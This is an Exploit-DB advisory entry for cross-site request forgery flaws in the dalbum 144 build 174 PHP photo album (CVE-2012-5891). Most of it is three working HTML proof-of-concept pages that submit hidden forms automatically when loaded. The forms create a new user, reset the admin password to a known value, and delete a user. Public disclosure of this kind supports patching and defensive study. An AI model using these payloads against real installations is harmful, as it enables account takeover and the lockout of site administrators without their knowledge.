EXPLOITS

dalbum 144 build 174 - Cross-Site Request Forgery

Author: Ahmed Elhady Mohamed
type: webapps
platform: php
port: 
date_added: 2012-03-30  
date_updated: 2012-04-06  
verified: 1  
codes: OSVDB-80745;CVE-2012-5891  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-04-06-at-25423-pm.png  
application_url: http://www.exploit-db.comdalbum144_174.zip  

raw file: 18685.txt  

dalbum 144 build 174 and earlier CSRF Vulnerabilities
===================================================================================
# Exploit Title:dalbum 144_174 and earlier CSRF Vulnerabilities
# Vendor: http://www.dalbum.org/
# Download link :http://www.dalbum.org/index.php?go=Downloads
# Author: Ahmed Elhady Mohamed
# Email : ahmed.elhady.mohamed@gmail.com
# version: 144 build 174
# Category: webapps
# Tested on: ubuntu 11.4
# This vulnerability allows a malicious hacker to add a user
  delete a user and change password of a user
===================================================================================
CSRF VUlnerabilities :

POC 1:

	<html>
	<head>
	<title>  Add a user </title>
	<script>
		function CSRF() {
			document.getElementById('CSRF').click();
		};
	</script>
	</head>
	<body onLoad="CSRF()">
		<form action="http://127.0.0.1/photo/pass.php" method="post" />
		<input name="user" value="CSRF" type="hidden" />
		<input name="pass" value="123" type="hidden" />
		<input name="passc" value="123" type="hidden" />
		<input type="hidden" name="action" value="add">
		<input type="submit" id="CSRF" name="submit" value="Submit">
	</form>
	</body>
	</html>

POC 2:

	<html>
	<head>
	<title>  Change user's password  </title>
	<script>
		function CSRF() {
			document.getElementById('CSRF').click();
		};
	</script>
	</head>
	<body onLoad="CSRF()">
	<form action="http://127.0.0.1/photo/pass.php" method="post" />
		<input name="user" value="admin" type="hidden" />
		<input name="pass" value="111" type="hidden" />
		<input name="passc" value="111" type="hidden" />
		<input name="change" value="Change password" type="hidden" />
		<input type="hidden" name="action" value="change">
		<input type="submit" id="CSRF" name="submit" value="Submit">
	</form>
	</body>
	</html>

POC 3:

	<html>
	<head>
	<title>  Delete a user  </title>
	<script>
		function CSRF() {
			document.getElementById('CSRF').click();
		};
	</script>
	</head>
	<body onLoad="CSRF()">
	<form action="http://127.0.0.1/photo/pass.php" method="post" />
		<input name="user" value="a" type="hidden" />
		<input type="hidden" name="delete" value="Delete">
		<input type="submit" id="CSRF" name="submit" value="Submit">
	</form>
	</body>
	</html>